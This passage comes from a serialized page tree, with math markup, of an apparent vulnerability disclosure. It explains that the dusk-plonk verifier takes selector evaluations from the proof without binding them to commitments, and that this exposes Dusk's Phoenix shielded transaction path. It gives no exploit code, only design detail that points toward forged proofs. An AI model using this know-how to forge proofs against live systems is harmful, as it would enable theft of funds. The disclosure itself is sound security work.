(",{"type":26,"tag":130,"props":2767,"children":2769},{"className":2768},[133,134],[2770],{"type":26,"tag":137,"props":2771,"children":2773},{"className":2772},[140],[2774],{"type":26,"tag":137,"props":2775,"children":2777},{"className":2776,"ariaHidden":146},[145],[2778],{"type":26,"tag":137,"props":2779,"children":2781},{"className":2780},[151],[2782,2786,2791,2796,2801],{"type":26,"tag":137,"props":2783,"children":2785},{"className":2784,"style":157},[156],[],{"type":26,"tag":137,"props":2787,"children":2789},{"className":2788},[169,170],[2790],{"type":32,"value":41},{"type":26,"tag":137,"props":2792,"children":2794},{"className":2793},[162],[2795],{"type":32,"value":165},{"type":26,"tag":137,"props":2797,"children":2799},{"className":2798,"style":2321},[169,170],[2800],{"type":32,"value":2324},{"type":26,"tag":137,"props":2802,"children":2804},{"className":2803},[197],[2805],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":2808,"children":2810},{"className":2809},[133,134],[2811],{"type":26,"tag":137,"props":2812,"children":2814},{"className":2813},[140],[2815],{"type":26,"tag":137,"props":2816,"children":2818},{"className":2817,"ariaHidden":146},[145],[2819],{"type":26,"tag":137,"props":2820,"children":2822},{"className":2821},[151],[2823,2827,2833,2838,2843],{"type":26,"tag":137,"props":2824,"children":2826},{"className":2825,"style":157},[156],[],{"type":26,"tag":137,"props":2828,"children":2830},{"className":2829},[169,170],[2831],{"type":32,"value":2832},"b",{"type":26,"tag":137,"props":2834,"children":2836},{"className":2835},[162],[2837],{"type":32,"value":165},{"type":26,"tag":137,"props":2839,"children":2841},{"className":2840,"style":2321},[169,170],[2842],{"type":32,"value":2324},{"type":26,"tag":137,"props":2844,"children":2846},{"className":2845},[197],[2847],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":2850,"children":2852},{"className":2851},[133,134],[2853],{"type":26,"tag":137,"props":2854,"children":2856},{"className":2855},[140],[2857],{"type":26,"tag":137,"props":2858,"children":2860},{"className":2859,"ariaHidden":146},[145],[2861],{"type":26,"tag":137,"props":2862,"children":2864},{"className":2863},[151],[2865,2869,2927,2932,2937],{"type":26,"tag":137,"props":2866,"children":2868},{"className":2867,"style":157},[156],[],{"type":26,"tag":137,"props":2870,"children":2872},{"className":2871},[169],[2873,2879],{"type":26,"tag":137,"props":2874,"children":2876},{"className":2875,"style":190},[169,170],[2877],{"type":32,"value":2878},"σ",{"type":26,"tag":137,"props":2880,"children":2882},{"className":2881},[236],[2883],{"type":26,"tag":137,"props":2884,"children":2886},{"className":2885},[241,417],[2887,2916],{"type":26,"tag":137,"props":2888,"children":2890},{"className":2889},[246],[2891,2911],{"type":26,"tag":137,"props":2892,"children":2894},{"className":2893,"style":426},[251],[2895],{"type":26,"tag":137,"props":2896,"children":2897},{"style":819},[2898,2902],{"type":26,"tag":137,"props":2899,"children":2901},{"className":2900,"style":262},[261],[],{"type":26,"tag":137,"props":2903,"children":2905},{"className":2904},[267,268,269,270],[2906],{"type":26,"tag":137,"props":2907,"children":2909},{"className":2908},[169,270],[2910],{"type":32,"value":878},{"type":26,"tag":137,"props":2912,"children":2914},{"className":2913},[453],[2915],{"type":32,"value":456},{"type":26,"tag":137,"props":2917,"children":2919},{"className":2918},[246],[2920],{"type":26,"tag":137,"props":2921,"children":2923},{"className":2922,"style":464},[251],[2924],{"type":26,"tag":137,"props":2925,"children":2926},{},[],{"type":26,"tag":137,"props":2928,"children":2930},{"className":2929},[162],[2931],{"type":32,"value":165},{"type":26,"tag":137,"props":2933,"children":2935},{"className":2934,"style":2321},[169,170],[2936],{"type":32,"value":2324},{"type":26,"tag":137,"props":2938,"children":2940},{"className":2939},[197],[2941],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":2944,"children":2946},{"className":2945},[133,134],[2947],{"type":26,"tag":137,"props":2948,"children":2950},{"className":2949},[140],[2951],{"type":26,"tag":137,"props":2952,"children":2954},{"className":2953,"ariaHidden":146},[145],[2955],{"type":26,"tag":137,"props":2956,"children":2958},{"className":2957},[151],[2959,2963,2968,2973,2978,2984],{"type":26,"tag":137,"props":2960,"children":2962},{"className":2961,"style":157},[156],[],{"type":26,"tag":137,"props":2964,"children":2966},{"className":2965},[169,170],[2967],{"type":32,"value":41},{"type":26,"tag":137,"props":2969,"children":2971},{"className":2970},[162],[2972],{"type":32,"value":165},{"type":26,"tag":137,"props":2974,"children":2976},{"className":2975,"style":2321},[169,170],[2977],{"type":32,"value":2324},{"type":26,"tag":137,"props":2979,"children":2981},{"className":2980,"style":190},[169,170],[2982],{"type":32,"value":2983},"ω",{"type":26,"tag":137,"props":2985,"children":2987},{"className":2986},[197],[2988],{"type":32,"value":200},{"type":32,"value":2990},"), which are safe because the opening binds them to previously committed polynomials. A third category consists of verifier-key commitments used directly in the linearization multiscalar multiplication (",{"type":26,"tag":130,"props":2992,"children":2994},{"className":2993},[133,134],[2995],{"type":26,"tag":137,"props":2996,"children":2998},{"className":2997},[140],[2999],{"type":26,"tag":137,"props":3000,"children":3002},{"className":3001,"ariaHidden":146},[145],[3003],{"type":26,"tag":137,"props":3004,"children":3006},{"className":3005},[151],[3007,3011,3017,3074],{"type":26,"tag":137,"props":3008,"children":3010},{"className":3009,"style":157},[156],[],{"type":26,"tag":137,"props":3012,"children":3014},{"className":3013},[162],[3015],{"type":32,"value":3016},"[",{"type":26,"tag":137,"props":3018,"children":3020},{"className":3019},[169],[3021,3026],{"type":26,"tag":137,"props":3022,"children":3024},{"className":3023,"style":190},[169,170],[3025],{"type":32,"value":799},{"type":26,"tag":137,"props":3027,"children":3029},{"className":3028},[236],[3030],{"type":26,"tag":137,"props":3031,"children":3033},{"className":3032},[241,417],[3034,3063],{"type":26,"tag":137,"props":3035,"children":3037},{"className":3036},[246],[3038,3058],{"type":26,"tag":137,"props":3039,"children":3041},{"className":3040,"style":815},[251],[3042],{"type":26,"tag":137,"props":3043,"children":3044},{"style":819},[3045,3049],{"type":26,"tag":137,"props":3046,"children":3048},{"className":3047,"style":262},[261],[],{"type":26,"tag":137,"props":3050,"children":3052},{"className":3051},[267,268,269,270],[3053],{"type":26,"tag":137,"props":3054,"children":3056},{"className":3055,"style":832},[169,170,270],[3057],{"type":32,"value":835},{"type":26,"tag":137,"props":3059,"children":3061},{"className":3060},[453],[3062],{"type":32,"value":456},{"type":26,"tag":137,"props":3064,"children":3066},{"className":3065},[246],[3067],{"type":26,"tag":137,"props":3068,"children":3070},{"className":3069,"style":464},[251],[3071],{"type":26,"tag":137,"props":3072,"children":3073},{},[],{"type":26,"tag":137,"props":3075,"children":3077},{"className":3076},[197],[3078],{"type":32,"value":3079},"]",{"type":32,"value":1108},{"type":26,"tag":130,"props":3082,"children":3084},{"className":3083},[133,134],[3085],{"type":26,"tag":137,"props":3086,"children":3088},{"className":3087},[140],[3089],{"type":26,"tag":137,"props":3090,"children":3092},{"className":3091,"ariaHidden":146},[145],[3093],{"type":26,"tag":137,"props":3094,"children":3096},{"className":3095},[151],[3097,3101,3106,3163],{"type":26,"tag":137,"props":3098,"children":3100},{"className":3099,"style":157},[156],[],{"type":26,"tag":137,"props":3102,"children":3104},{"className":3103},[162],[3105],{"type":32,"value":3016},{"type":26,"tag":137,"props":3107,"children":3109},{"className":3108},[169],[3110,3115],{"type":26,"tag":137,"props":3111,"children":3113},{"className":3112,"style":190},[169,170],[3114],{"type":32,"value":799},{"type":26,"tag":137,"props":3116,"children":3118},{"className":3117},[236],[3119],{"type":26,"tag":137,"props":3120,"children":3122},{"className":3121},[241,417],[3123,3152],{"type":26,"tag":137,"props":3124,"children":3126},{"className":3125},[246],[3127,3147],{"type":26,"tag":137,"props":3128,"children":3130},{"className":3129,"style":815},[251],[3131],{"type":26,"tag":137,"props":3132,"children":3133},{"style":819},[3134,3138],{"type":26,"tag":137,"props":3135,"children":3137},{"className":3136,"style":262},[261],[],{"type":26,"tag":137,"props":3139,"children":3141},{"className":3140},[267,268,269,270],[3142],{"type":26,"tag":137,"props":3143,"children":3145},{"className":3144,"style":621},[169,170,270],[3146],{"type":32,"value":1265},{"type":26,"tag":137,"props":3148,"children":3150},{"className":3149},[453],[3151],{"type":32,"value":456},{"type":26,"tag":137,"props":3153,"children":3155},{"className":3154},[246],[3156],{"type":26,"tag":137,"props":3157,"children":3159},{"className":3158,"style":464},[251],[3160],{"type":26,"tag":137,"props":3161,"children":3162},{},[],{"type":26,"tag":137,"props":3164,"children":3166},{"className":3165},[197],[3167],{"type":32,"value":3079},{"type":32,"value":1108},{"type":26,"tag":130,"props":3170,"children":3172},{"className":3171},[133,134],[3173],{"type":26,"tag":137,"props":3174,"children":3176},{"className":3175},[140],[3177],{"type":26,"tag":137,"props":3178,"children":3180},{"className":3179,"ariaHidden":146},[145],[3181],{"type":26,"tag":137,"props":3182,"children":3184},{"className":3183},[151],[3185,3189,3194,3252],{"type":26,"tag":137,"props":3186,"children":3188},{"className":3187,"style":157},[156],[],{"type":26,"tag":137,"props":3190,"children":3192},{"className":3191},[162],[3193],{"type":32,"value":3016},{"type":26,"tag":137,"props":3195,"children":3197},{"className":3196},[169],[3198,3203],{"type":26,"tag":137,"props":3199,"children":3201},{"className":3200,"style":190},[169,170],[3202],{"type":32,"value":2878},{"type":26,"tag":137,"props":3204,"children":3206},{"className":3205},[236],[3207],{"type":26,"tag":137,"props":3208,"children":3210},{"className":3209},[241,417],[3211,3241],{"type":26,"tag":137,"props":3212,"children":3214},{"className":3213},[246],[3215,3236],{"type":26,"tag":137,"props":3216,"children":3218},{"className":3217,"style":426},[251],[3219],{"type":26,"tag":137,"props":3220,"children":3221},{"style":819},[3222,3226],{"type":26,"tag":137,"props":3223,"children":3225},{"className":3224,"style":262},[261],[],{"type":26,"tag":137,"props":3227,"children":3229},{"className":3228},[267,268,269,270],[3230],{"type":26,"tag":137,"props":3231,"children":3233},{"className":3232},[169,270],[3234],{"type":32,"value":3235},"4",{"type":26,"tag":137,"props":3237,"children":3239},{"className":3238},[453],[3240],{"type":32,"value":456},{"type":26,"tag":137,"props":3242,"children":3244},{"className":3243},[246],[3245],{"type":26,"tag":137,"props":3246,"children":3248},{"className":3247,"style":464},[251],[3249],{"type":26,"tag":137,"props":3250,"children":3251},{},[],{"type":26,"tag":137,"props":3253,"children":3255},{"className":3254},[197],[3256],{"type":32,"value":3079},{"type":32,"value":3258},"), which are safe because the verifier never trusts a bare field element for these; it uses the commitment itself.",{"type":26,"tag":35,"props":3260,"children":3261},{},[3262],{"type":32,"value":3263},"Any term that falls outside those three categories is attacker-controlled by construction.",{"type":26,"tag":3265,"props":3266,"children":3267},"hr",{},[],{"type":26,"tag":92,"props":3269,"children":3271},{"id":3270},"where-dusk-plonk-differs-from-textbook-plonk",[3272],{"type":32,"value":3273},"Where dusk-plonk differs from textbook PLONK",{"type":26,"tag":35,"props":3275,"children":3276},{},[3277,3286,3288,3294,3296,3326],{"type":26,"tag":41,"props":3278,"children":3280},{"href":43,"rel":3279},[45],[3281],{"type":26,"tag":130,"props":3282,"children":3284},{"className":3283},[],[3285],{"type":32,"value":48},{"type":32,"value":3287}," is not a literal transcription of the 2019 PLONK paper. It extends the arithmetic gate with a fourth wire ",{"type":26,"tag":130,"props":3289,"children":3291},{"className":3290},[],[3292],{"type":32,"value":3293},"d",{"type":32,"value":3295},", adds custom widgets for range, logic, and elliptic-curve operations, uses shifted evaluations at ",{"type":26,"tag":130,"props":3297,"children":3299},{"className":3298},[133,134],[3300],{"type":26,"tag":137,"props":3301,"children":3303},{"className":3302},[140],[3304],{"type":26,"tag":137,"props":3305,"children":3307},{"className":3306,"ariaHidden":146},[145],[3308],{"type":26,"tag":137,"props":3309,"children":3311},{"className":3310},[151],[3312,3316,3321],{"type":26,"tag":137,"props":3313,"children":3315},{"className":3314,"style":1542},[156],[],{"type":26,"tag":137,"props":3317,"children":3319},{"className":3318,"style":2321},[169,170],[3320],{"type":32,"value":2324},{"type":26,"tag":137,"props":3322,"children":3324},{"className":3323,"style":190},[169,170],[3325],{"type":32,"value":2983},{"type":32,"value":3327},", and heavily batches KZG openings. None of that is exotic by modern PLONK standards, but it does make the verifier harder to reason about than the minimal paper presentation.",{"type":26,"tag":35,"props":3329,"children":3330},{},[3331,3333,3338,3340,3345,3347,3353,3355,3362],{"type":32,"value":3332},"The important part for this bug is the boundary between ",{"type":26,"tag":84,"props":3334,"children":3335},{},[3336],{"type":32,"value":3337},"public circuit data",{"type":32,"value":3339}," and ",{"type":26,"tag":84,"props":3341,"children":3342},{},[3343],{"type":32,"value":3344},"prover claims about that data at the random challenge point",{"type":32,"value":3346},". Parallel implementations avoid this ambiguity by keeping selector polynomials strictly out of the prover's hands. For example, Consensys' gnark (one of the most widely deployed PLONK implementations) never asks the prover for selector evaluations at all. Instead, the verifier incorporates the selector commitments ",{"type":26,"tag":130,"props":3348,"children":3350},{"className":3349},[],[3351],{"type":32,"value":3352},"Ql, Qr, Qm, Qo, Qk",{"type":32,"value":3354}," directly into the ",{"type":26,"tag":41,"props":3356,"children":3359},{"href":3357,"rel":3358},"https://github.com/Consensys/gnark/blob/17b079f1b813d9dafd465202466b09f282b4c5e9/backend/plonk/bls12-381/verify.go#L253-L270",[45],[3360],{"type":32,"value":3361},"linearization multi-scalar multiplication",{"type":32,"value":3363},", ensuring their values are cryptographically bound by construction.",{"type":26,"tag":35,"props":3365,"children":3366},{},[3367,3369,3394],{"type":32,"value":3368},"Dusk's custom widgets were more complex (multiplying selectors with other evaluated terms), so they could not just use a simple linear combination of commitments. Their architecture required evaluating the selectors at ",{"type":26,"tag":130,"props":3370,"children":3372},{"className":3371},[133,134],[3373],{"type":26,"tag":137,"props":3374,"children":3376},{"className":3375},[140],[3377],{"type":26,"tag":137,"props":3378,"children":3380},{"className":3379,"ariaHidden":146},[145],[3381],{"type":26,"tag":137,"props":3382,"children":3384},{"className":3383},[151],[3385,3389],{"type":26,"tag":137,"props":3386,"children":3388},{"className":3387,"style":1542},[156],[],{"type":26,"tag":137,"props":3390,"children":3392},{"className":3391,"style":2321},[169,170],[3393],{"type":32,"value":2324},{"type":32,"value":3395}," and using those scalars. But while they serialized those four selector evaluations into the proof struct, they never actually verified them against the verifier key's commitments through an opening proof.",{"type":26,"tag":35,"props":3397,"children":3398},{},[3399],{"type":32,"value":3400},"The shortest way to see the bug is the graph below: safe values flow through the opening path toward the final pairing check, while the red selector flow enters verifier logic without ever touching an opening proof.",{"type":26,"tag":3402,"props":3403,"children":3404},"dusk-verifier-dependence-graph",{},[],{"type":26,"tag":3265,"props":3406,"children":3407},{},[],{"type":26,"tag":92,"props":3409,"children":3411},{"id":3410},"how-dusk-uses-plonk",[3412],{"type":32,"value":3413},"How Dusk uses PLONK",{"type":26,"tag":35,"props":3415,"children":3416},{},[3417,3423],{"type":26,"tag":41,"props":3418,"children":3420},{"href":53,"rel":3419},[45],[3421],{"type":32,"value":3422},"Dusk Network",{"type":32,"value":3424}," is a privacy-focused L1 blockchain. Its transaction model has two modes:",{"type":26,"tag":3426,"props":3427,"children":3428},"ul",{},[3429,3435],{"type":26,"tag":3430,"props":3431,"children":3432},"li",{},[3433],{"type":32,"value":3434},"Phoenix (shielded): amounts and participants are hidden using ZK proofs, and every Phoenix transaction carries a PLONK proof that the transaction is valid.",{"type":26,"tag":3430,"props":3436,"children":3437},{},[3438],{"type":32,"value":3439},"Moonlight (transparent): standard account-based transactions verified by BLS signatures, with no PLONK involvement.",{"type":26,"tag":35,"props":3441,"children":3442},{},[3443,3445,3456,3458,3469],{"type":32,"value":3444},"At node level, every ",{"type":26,"tag":41,"props":3446,"children":3449},{"href":3447,"rel":3448},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L152-L185",[45],[3450],{"type":26,"tag":130,"props":3451,"children":3453},{"className":3452},[],[3454],{"type":32,"value":3455},"ProtocolTransaction::Phoenix",{"type":32,"value":3457}," goes through ",{"type":26,"tag":41,"props":3459,"children":3462},{"href":3460,"rel":3461},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/verifier.rs#L71-L82",[45],[3463],{"type":26,"tag":130,"props":3464,"children":3466},{"className":3465},[],[3467],{"type":32,"value":3468},"verify_proof_with_version()",{"type":32,"value":3470}," during preverification. If that PLONK proof verifies, the transaction is admitted to the mempool and can later be mined into a block. Moonlight-path transactions instead go through BLS signature verification.",{"type":26,"tag":35,"props":3472,"children":3473},{},[3474,3476,3487,3489,3500,3501,3512,3513,3524,3526,3537],{"type":32,"value":3475},"That same Phoenix proof path covers more than simple shielded transfers. Phoenix-path staking, reward withdrawals, unstaking, and Phoenix-to-Moonlight conversion all build a Phoenix transaction via ",{"type":26,"tag":41,"props":3477,"children":3480},{"href":3478,"rel":3479},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L54-L95",[45],[3481],{"type":26,"tag":130,"props":3482,"children":3484},{"className":3483},[],[3485],{"type":32,"value":3486},"phoenix()",{"type":32,"value":3488},", for example in ",{"type":26,"tag":41,"props":3490,"children":3493},{"href":3491,"rel":3492},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L144-L186",[45],[3494],{"type":26,"tag":130,"props":3495,"children":3497},{"className":3496},[],[3498],{"type":32,"value":3499},"phoenix_stake()",{"type":32,"value":1108},{"type":26,"tag":41,"props":3502,"children":3505},{"href":3503,"rel":3504},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L240-L298",[45],[3506],{"type":26,"tag":130,"props":3507,"children":3509},{"className":3508},[],[3510],{"type":32,"value":3511},"phoenix_stake_reward()",{"type":32,"value":1108},{"type":26,"tag":41,"props":3514,"children":3517},{"href":3515,"rel":3516},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L358-L416",[45],[3518],{"type":26,"tag":130,"props":3519,"children":3521},{"className":3520},[],[3522],{"type":32,"value":3523},"phoenix_unstake()",{"type":32,"value":3525},", and ",{"type":26,"tag":41,"props":3527,"children":3530},{"href":3528,"rel":3529},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L481-L539",[45],[3531],{"type":26,"tag":130,"props":3532,"children":3534},{"className":3533},[],[3535],{"type":32,"value":3536},"phoenix_to_moonlight()",{"type":32,"value":3538},". So if Phoenix proof verification is unsound, the entire shielded transaction path is exposed.",{"type":26,"tag":35,"props":3540,"children":3541},{},[3542],{"type":26,"tag":2210,"props":3543,"children":3546},{"alt":3544,"src":3545},"phoenix_moonlight","/posts/dusk-commitment-issues/phoenix_moonlight.svg",[],{"type":26,"tag":35,"props":3548,"children":3549},{},[3550,3552,3558,3560,3567],{"type":32,"value":3551},"The PLONK implementation, ",{"type":26,"tag":41,"props":3553,"children":3556},{"href":3554,"rel":3555},"https://github.com/dusk-network/plonk",[45],[3557],{"type":32,"value":48},{"type":32,"value":3559},", is a standalone library by the Dusk team. It was among the first PLONK implementations written, with development starting the same year ",{"type":26,"tag":41,"props":3561,"children":3564},{"href":3562,"rel":3563},"https://eprint.iacr.org/archive/2019/953/1566424053.pdf",[45],[3565],{"type":32,"value":3566},"the original paper",{"type":32,"value":3568}," was released.",{"type":26,"tag":35,"props":3570,"children":3571},{},[3572,3574,3581],{"type":32,"value":3573},"The Phoenix transaction PLONK circuit is defined ",{"type":26,"tag":41,"props":3575,"children":3578},{"href":3576,"rel":3577},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L20-L205",[45],[3579],{"type":32,"value":3580},"here",{"type":32,"value":3582},". The circuit enforces the following set of constraints:",{"type":26,"tag":3584,"props":3585,"children":3586},"table",{},[3587,3606],{"type":26,"tag":3588,"props":3589,"children":3590},"thead",{},[3591],{"type":26,"tag":3592,"props":3593,"children":3594},"tr",{},[3595,3601],{"type":26,"tag":3596,"props":3597,"children":3598},"th",{},[3599],{"type":32,"value":3600},"Circuit check",{"type":26,"tag":3596,"props":3602,"children":3603},{},[3604],{"type":32,"value":3605},"Statement being checked",{"type":26,"tag":3607,"props":3608,"children":3609},"tbody",{},[3610,3629,3647,3665,3683,3847,3989,4007],{"type":26,"tag":3592,"props":3611,"children":3612},{},[3613,3624],{"type":26,"tag":3614,"props":3615,"children":3616},"td",{},[3617],{"type":26,"tag":41,"props":3618,"children":3621},{"href":3619,"rel":3620},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L106-L126",[45],[3622],{"type":32,"value":3623},"Merkle tree membership",{"type":26,"tag":3614,"props":3625,"children":3626},{},[3627],{"type":32,"value":3628},"Each input note hash is opened against the public Merkle root, so only notes already in the note tree may be spent",{"type":26,"tag":3592,"props":3630,"children":3631},{},[3632,3642],{"type":26,"tag":3614,"props":3633,"children":3634},{},[3635],{"type":26,"tag":41,"props":3636,"children":3639},{"href":3637,"rel":3638},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L70-L79",[45],[3640],{"type":32,"value":3641},"Input-note secret-key authorization",{"type":26,"tag":3614,"props":3643,"children":3644},{},[3645],{"type":32,"value":3646},"The prover knows the secret key controlling each input note",{"type":26,"tag":3592,"props":3648,"children":3649},{},[3650,3660],{"type":26,"tag":3614,"props":3651,"children":3652},{},[3653],{"type":26,"tag":41,"props":3654,"children":3657},{"href":3655,"rel":3656},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L81-L87",[45],[3658],{"type":32,"value":3659},"Nullifier correctness",{"type":26,"tag":3614,"props":3661,"children":3662},{},[3663],{"type":32,"value":3664},"Each nullifier matches the corresponding note key and position",{"type":26,"tag":3592,"props":3666,"children":3667},{},[3668,3678],{"type":26,"tag":3614,"props":3669,"children":3670},{},[3671],{"type":26,"tag":41,"props":3672,"children":3675},{"href":3673,"rel":3674},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L149-L160",[45],[3676],{"type":32,"value":3677},"Output value commitment correctness",{"type":26,"tag":3614,"props":3679,"children":3680},{},[3681],{"type":32,"value":3682},"Each public output commitment matches the secret output value and blinder",{"type":26,"tag":3592,"props":3684,"children":3685},{},[3686,3696],{"type":26,"tag":3614,"props":3687,"children":3688},{},[3689],{"type":26,"tag":41,"props":3690,"children":3693},{"href":3691,"rel":3692},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L167-L178",[45],[3694],{"type":32,"value":3695},"Balance integrity",{"type":26,"tag":3614,"props":3697,"children":3698},{},[3699],{"type":26,"tag":130,"props":3700,"children":3702},{"className":3701},[133,134],[3703],{"type":26,"tag":137,"props":3704,"children":3706},{"className":3705},[140],[3707],{"type":26,"tag":137,"props":3708,"children":3710},{"className":3709,"ariaHidden":146},[145],[3711,3756,3796,3828],{"type":26,"tag":137,"props":3712,"children":3714},{"className":3713},[151],[3715,3719,3729,3733,3743,3747,3752],{"type":26,"tag":137,"props":3716,"children":3718},{"className":3717,"style":157},[156],[],{"type":26,"tag":137,"props":3720,"children":3726},{"className":3721,"style":3725},[3722,3723,3724],"mop","op-symbol","small-op","position:relative;top:0em;",[3727],{"type":32,"value":3728},"∑",{"type":26,"tag":137,"props":3730,"children":3732},{"className":3731,"style":185},[184],[],{"type":26,"tag":137,"props":3734,"children":3736},{"className":3735},[169,32],[3737],{"type":26,"tag":137,"props":3738,"children":3740},{"className":3739},[169],[3741],{"type":32,"value":3742},"inputs",{"type":26,"tag":137,"props":3744,"children":3746},{"className":3745,"style":281},[184],[],{"type":26,"tag":137,"props":3748,"children":3750},{"className":3749},[286],[3751],{"type":32,"value":289},{"type":26,"tag":137,"props":3753,"children":3755},{"className":3754,"style":281},[184],[],{"type":26,"tag":137,"props":3757,"children":3759},{"className":3758},[151],[3760,3764,3769,3773,3783,3787,3792],{"type":26,"tag":137,"props":3761,"children":3763},{"className":3762,"style":157},[156],[],{"type":26,"tag":137,"props":3765,"children":3767},{"className":3766,"style":3725},[3722,3723,3724],[3768],{"type":32,"value":3728},{"type":26,"tag":137,"props":3770,"children":3772},{"className":3771,"style":185},[184],[],{"type":26,"tag":137,"props":3774,"children":3776},{"className":3775},[169,32],[3777],{"type":26,"tag":137,"props":3778,"children":3780},{"className":3779},[169],[3781],{"type":32,"value":3782},"outputs",{"type":26,"tag":137,"props":3784,"children":3786},{"className":3785,"style":348},[184],[],{"type":26,"tag":137,"props":3788,"children":3790},{"className":3789},[353],[3791],{"type":32,"value":356},{"type":26,"tag":137,"props":3793,"children":3795},{"className":3794,"style":348},[184],[],{"type":26,"tag":137,"props":3797,"children":3799},{"className":3798},[151],[3800,3805,3815,3819,3824],{"type":26,"tag":137,"props":3801,"children":3804},{"className":3802,"style":3803},[156],"height:0.7778em;vertical-align:-0.0833em;",[],{"type":26,"tag":137,"props":3806,"children":3808},{"className":3807},[169,32],[3809],{"type":26,"tag":137,"props":3810,"children":3812},{"className":3811},[169],[3813],{"type":32,"value":3814},"fee",{"type":26,"tag":137,"props":3816,"children":3818},{"className":3817,"style":348},[184],[],{"type":26,"tag":137,"props":3820,"children":3822},{"className":3821},[353],[3823],{"type":32,"value":356},{"type":26,"tag":137,"props":3825,"children":3827},{"className":3826,"style":348},[184],[],{"type":26,"tag":137,"props":3829,"children":3831},{"className":3830},[151],[3832,3837],{"type":26,"tag":137,"props":3833,"children":3836},{"className":3834,"style":3835},[156],"height:0.8889em;vertical-align:-0.1944em;",[],{"type":26,"tag":137,"props":3838,"children":3840},{"className":3839},[169,32],[3841],{"type":26,"tag":137,"props":3842,"children":3844},{"className":3843},[169],[3845],{"type":32,"value":3846},"deposit",{"type":26,"tag":3592,"props":3848,"children":3849},{},[3850,3867],{"type":26,"tag":3614,"props":3851,"children":3852},{},[3853,3860,3861],{"type":26,"tag":41,"props":3854,"children":3857},{"href":3855,"rel":3856},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L89-L90",[45],[3858],{"type":32,"value":3859},"Range checks on inputs",{"type":32,"value":3339},{"type":26,"tag":41,"props":3862,"children":3865},{"href":3863,"rel":3864},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L141-L142",[45],[3866],{"type":32,"value":3782},{"type":26,"tag":3614,"props":3868,"children":3869},{},[3870,3872],{"type":32,"value":3871},"All note values lie in ",{"type":26,"tag":130,"props":3873,"children":3875},{"className":3874},[133,134],[3876],{"type":26,"tag":137,"props":3877,"children":3879},{"className":3878},[140],[3880],{"type":26,"tag":137,"props":3881,"children":3883},{"className":3882,"ariaHidden":146},[145],[3884,3971],{"type":26,"tag":137,"props":3885,"children":3887},{"className":3886},[151],[3888,3893,3898,3903,3908,3912,3958,3962,3967],{"type":26,"tag":137,"props":3889,"children":3892},{"className":3890,"style":3891},[156],"height:1.0641em;vertical-align:-0.25em;",[],{"type":26,"tag":137,"props":3894,"children":3896},{"className":3895},[162],[3897],{"type":32,"value":3016},{"type":26,"tag":137,"props":3899,"children":3901},{"className":3900},[169],[3902],{"type":32,"value":1817},{"type":26,"tag":137,"props":3904,"children":3906},{"className":3905},[177],[3907],{"type":32,"value":180},{"type":26,"tag":137,"props":3909,"children":3911},{"className":3910,"style":185},[184],[],{"type":26,"tag":137,"props":3913,"children":3915},{"className":3914},[169],[3916,3921],{"type":26,"tag":137,"props":3917,"children":3919},{"className":3918},[169],[3920],{"type":32,"value":277},{"type":26,"tag":137,"props":3922,"children":3924},{"className":3923},[236],[3925],{"type":26,"tag":137,"props":3926,"children":3928},{"className":3927},[241],[3929],{"type":26,"tag":137,"props":3930,"children":3932},{"className":3931},[246],[3933],{"type":26,"tag":137,"props":3934,"children":3936},{"className":3935,"style":252},[251],[3937],{"type":26,"tag":137,"props":3938,"children":3939},{"style":256},[3940,3944],{"type":26,"tag":137,"props":3941,"children":3943},{"className":3942,"style":262},[261],[],{"type":26,"tag":137,"props":3945,"children":3947},{"className":3946},[267,268,269,270],[3948],{"type":26,"tag":137,"props":3949,"children":3951},{"className":3950},[169,270],[3952],{"type":26,"tag":137,"props":3953,"children":3955},{"className":3954},[169,270],[3956],{"type":32,"value":3957},"64",{"type":26,"tag":137,"props":3959,"children":3961},{"className":3960,"style":348},[184],[],{"type":26,"tag":137,"props":3963,"children":3965},{"className":3964},[353],[3966],{"type":32,"value":1935},{"type":26,"tag":137,"props":3968,"children":3970},{"className":3969,"style":348},[184],[],{"type":26,"tag":137,"props":3972,"children":3974},{"className":3973},[151],[3975,3979,3984],{"type":26,"tag":137,"props":3976,"children":3978},{"className":3977,"style":157},[156],[],{"type":26,"tag":137,"props":3980,"children":3982},{"className":3981},[169],[3983],{"type":32,"value":878},{"type":26,"tag":137,"props":3985,"children":3987},{"className":3986},[197],[3988],{"type":32,"value":3079},{"type":26,"tag":3592,"props":3990,"children":3991},{},[3992,4002],{"type":26,"tag":3614,"props":3993,"children":3994},{},[3995],{"type":26,"tag":41,"props":3996,"children":3999},{"href":3997,"rel":3998},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L28-L51",[45],[4000],{"type":32,"value":4001},"Sender-authorship 